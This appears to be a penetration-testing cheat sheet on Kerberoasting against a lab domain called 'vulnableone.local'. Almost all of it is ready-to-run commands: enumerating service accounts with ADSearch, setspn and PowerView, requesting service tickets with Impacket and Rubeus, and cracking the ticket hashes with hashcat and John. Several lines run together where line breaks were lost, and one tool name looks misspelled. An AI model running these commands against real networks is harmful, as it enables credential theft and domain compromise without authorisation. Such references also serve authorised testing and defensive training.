Kerberoasting
Discovery Kerberos Account
# ADSearch
ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName
# Setspn
PS C:\> setspn -T vulnableone.local -Q */*
# PowerView
Get-DomainUser -SPN | select serviceprincipalname
# AD-Module
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalNameImpacket
impacket-GetUserSPNs vulnableone.local/svc:Passvord123 -dc-ip 10.10.10.10 -requestRubeus
Rubeus.exe kerberoast /simple /nowrap
Rubeus.exe kerberoast /user:svc /nowrap
Rubeus.exe kerberoast /stats
Rubeus.exe kerberoast /rc4opsec /outfile:C:\Users\khan.chanthou\Desktop\hashes.txt
Rubeus.exe kerberoast /rc4opsec /domain:vulnableone.local /outfile:C:\Users\khan.chanthou\Desktop\hashes.txtCrack Hash
Hashcat
hashcat -m 13100 -a 0 hash.txt /usr/share/wordlist/rockyou.txtJohn
kirb2j0hn ticket.kirbi > crackfile
john --format=krb5tgs crackfile --wordlist=10k-worst-pass.txtCrack with kerberos tool
python /usr/share/kerberoast/tgsrepcrack.py wordlist.txt 1-40a50000-svc@HTTP~WEB.vulnableone.local-VULNABLEONE.LOCAL.kirbiLast updated